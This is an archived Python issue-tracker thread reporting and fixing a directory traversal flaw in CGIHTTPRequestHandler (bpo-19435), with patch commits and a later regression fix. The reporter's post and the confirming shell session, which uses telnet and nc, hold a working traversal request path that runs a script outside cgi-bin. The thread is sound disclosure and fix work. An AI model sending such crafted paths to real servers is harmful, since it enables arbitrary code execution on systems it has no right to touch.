Directory traversal attack for CGIHTTPRequestHandler #63634

Closed
AlexanderKruppa mannequin opened this issue Oct 29, 2013 · 6 comments

AlexanderKruppa mannequin commented Oct 29, 2013

BPO 19435
Nosy @warsaw, @birkenfeld, @vstinner, @larryhastings, @tiran, @benjaminp, @ned-deily, @Janzert
Files
  • cgi.patch
  • Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state.

    GitHub fields:

    assignee = 'https://github.com/tiran'
    closed_at = <Date 2013-10-30.16:51:29.356>
    created_at = <Date 2013-10-29.16:34:01.527>
    labels = ['type-security', 'library', 'release-blocker']
    title = 'Directory traversal attack for CGIHTTPRequestHandler'
    updated_at = <Date 2014-07-13.05:34:43.791>
    user = 'https://bugs.python.org/AlexanderKruppa'

    bugs.python.org fields:

    activity = <Date 2014-07-13.05:34:43.791>
    actor = 'ned.deily'
    assignee = 'christian.heimes'
    closed = True
    closed_date = <Date 2013-10-30.16:51:29.356>
    closer = 'python-dev'
    components = ['Library (Lib)']
    creation = <Date 2013-10-29.16:34:01.527>
    creator = 'Alexander.Kruppa'
    dependencies = []
    files = ['32413']
    hgrepos = []
    issue_num = 19435
    keywords = ['patch']
    message_count = 6.0
    messages = ['201645', '201647', '201673', '201747', '222911', '222913']
    nosy_count = 12.0
    nosy_names = ['barry', 'georg.brandl', 'vstinner', 'larry', 'christian.heimes', 'benjamin.peterson', 'ned.deily', 'Arfrever', 'python-dev', 'janzert', 'Alexander.Kruppa', 'glondu']
    pr_nums = []
    priority = 'release blocker'
    resolution = 'fixed'
    stage = 'resolved'
    status = 'closed'
    superseder = None
    type = 'security'
    url = 'https://bugs.python.org/issue19435'
    versions = ['Python 2.7', 'Python 3.2', 'Python 3.3', 'Python 3.4']


    AlexanderKruppa mannequin commented Oct 29, 2013

    An error in separating the path and filename of the CGI script to run in http.server.CGIHTTPRequestHandler allows running arbitrary executables in the directory under which the server was started.

    The problem is that in CGIHTTPRequestHandler we have:

      def run_cgi(self):    
          """Execute a CGI script."""    
          path = self.path    
          dir, rest = self.cgi_info    
      
          i = path.find('/', len(dir) + 1)    

    where path is the uncollapsed path in the URL, but cgi_info contains the first path segment and the rest from the *collapsed* path as filled in by is_cgi(), so indexing into path via len(dir) is incorrect.

    An example exploit is giving the request path:

    ///////////badscript.sh/../cgi-bin/cgi.sh

    Note that Firefox and wget at least simplify the path in the request; to make sure this exact path is used, do for example:

    (echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1"; echo) | telnet localhost 4443

    This causes the CGIHTTPRequestHandler to execute the badscript.sh file in the directory in which the server was started, so script execution is not restricted to the cgi-bin/ or htbin/ subdirectories.

    @AlexanderKruppa AlexanderKruppa mannequin added stdlib Python modules in the Lib dir type-security A security issue labels Oct 29, 2013

    tiran commented Oct 29, 2013

    I can confirm the issue:

    $ mkdir www
    $ cd www
    $ cat << EOF > badscript.sh
    #!/bin/sh
    echo hacked
    EOF
    $ chmod +x badscript.sh
    $ ../python -m http.server --cgi
    
    
    $ echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1" | nc localhost 8000
    HTTP/1.0 200 Script output follows
    Server: SimpleHTTP/0.6 Python/3.4.0a4+
    Date: Tue, 29 Oct 2013 16:47:22 GMT
    hacked

    @tiran tiran self-assigned this Oct 29, 2013
    @benjaminp
    Contributor

    Patch


    python-dev mannequin commented Oct 30, 2013

    New changeset e4fe8fcaef0d by Benjamin Peterson in branch '2.7':
    use the collapsed path in the run_cgi method (closes bpo-19435)
    http://hg.python.org/cpython/rev/e4fe8fcaef0d

    New changeset b1ddcb220a7f by Benjamin Peterson in branch '3.1':
    use the collapsed path in the run_cgi method (closes bpo-19435)
    http://hg.python.org/cpython/rev/b1ddcb220a7f

    New changeset dda1a32748e0 by Benjamin Peterson in branch '3.2':
    merge 3.1 (bpo-19435)
    http://hg.python.org/cpython/rev/dda1a32748e0

    New changeset 544b654d000c by Benjamin Peterson in branch '3.3':
    merge 3.2 (bpo-19435)
    http://hg.python.org/cpython/rev/544b654d000c

    New changeset 493a99acaf00 by Benjamin Peterson in branch 'default':
    merge 3.3 (bpo-19435)
    http://hg.python.org/cpython/rev/493a99acaf00

    @python-dev python-dev mannequin closed this as completed Oct 30, 2013
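
The indexing mismatch reported above and the "use the collapsed path" direction named in the changesets, as an added example that is not CPython's code and not part of the original thread. It is a simplified model: `collapse`, `resolve_script`, `EXISTING_DIRS` and the `use_collapsed` switch are names assumed here for illustration, and the document root is a constructed set rather than a real filesystem.

```python
# Simplified model of the path handling discussed in this issue (not CPython's code).
CGI_DIRECTORIES = ["/cgi-bin", "/htbin"]
# Constructed document root: directories that exist where the server was started.
EXISTING_DIRS = {"/", "/cgi-bin"}


def collapse(url_path):
    """Resolve '.', '..' and repeated slashes, like the collapsed path."""
    parts = []
    for seg in url_path.split("/"):
        if seg == "..":
            if parts:
                parts.pop()
        elif seg and seg != ".":
            parts.append(seg)
    return "/" + "/".join(parts)


def is_cgi(url_path):
    """Return (dir, rest) taken from the collapsed path, or None."""
    collapsed = collapse(url_path)
    sep = collapsed.find("/", 1)
    head, tail = collapsed[:sep], collapsed[sep + 1:]
    return (head, tail) if head in CGI_DIRECTORIES else None


def resolve_script(url_path, use_collapsed):
    """Model of run_cgi's script selection; returns the file that would run."""
    info = is_cgi(url_path)
    if info is None:
        return None
    dir_, rest = info
    # use_collapsed=False: index the raw request path with len(dir) (the bug).
    # use_collapsed=True: rebuild the path from cgi_info so both sides agree.
    path = dir_ + "/" + rest if use_collapsed else url_path
    i = path.find("/", len(dir_) + 1)
    while i >= 0:
        nextdir, nextrest = path[:i], path[i + 1:]
        if collapse(nextdir) not in EXISTING_DIRS:
            break
        dir_, rest = nextdir, nextrest
        i = path.find("/", len(dir_) + 1)
    script = rest.split("/", 1)[0]
    return collapse(dir_ + "/" + script)


def needs_normalization(url_path):
    """Log-review check: the raw request path differs from its collapsed form."""
    return url_path != collapse(url_path)
```

With the raw path, the offset computed from the collapsed `dir` lands inside the run of leading slashes, so the directory walk stops at the server's start directory instead of `cgi-bin/`. `needs_normalization` is the kind of check that flags such requests in access logs.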

    python-dev mannequin commented Jul 13, 2014

    New changeset d367ea865ea4 by Ned Deily in branch '2.7':
    Issue bpo-21323: Fix CGIHTTPServer to again handle scripts in CGI subdirectories,
    http://hg.python.org/cpython/rev/d367ea865ea4

    New changeset 4de94641ba3e by Ned Deily in branch '3.2':
    Issue bpo-21323: Fix http.server to again handle scripts in CGI subdirectories,
    http://hg.python.org/cpython/rev/4de94641ba3e

    New changeset b957f475e41e by Ned Deily in branch '3.3':
    Issue bpo-21323: Fix http.server to again handle scripts in CGI subdirectories,
    http://hg.python.org/cpython/rev/b957f475e41e

    New changeset 385f4406dc26 by Ned Deily in branch '3.4':
    Issue bpo-21323: Fix http.server to again handle scripts in CGI subdirectories,
    http://hg.python.org/cpython/rev/385f4406dc26

    New changeset 22e5a85ba840 by Ned Deily in branch 'default':
    Issue bpo-21323: Fix http.server to again handle scripts in CGI subdirectories,
    http://hg.python.org/cpython/rev/22e5a85ba840

    @ned-deily
    Member

    See bpo-21323 for details of a problem introduced by the original fixes for this problem and now fixed (except for 3.1 which is now end-of-life).

    @ezio-melotti ezio-melotti transferred this issue from another repository Apr 10, 2022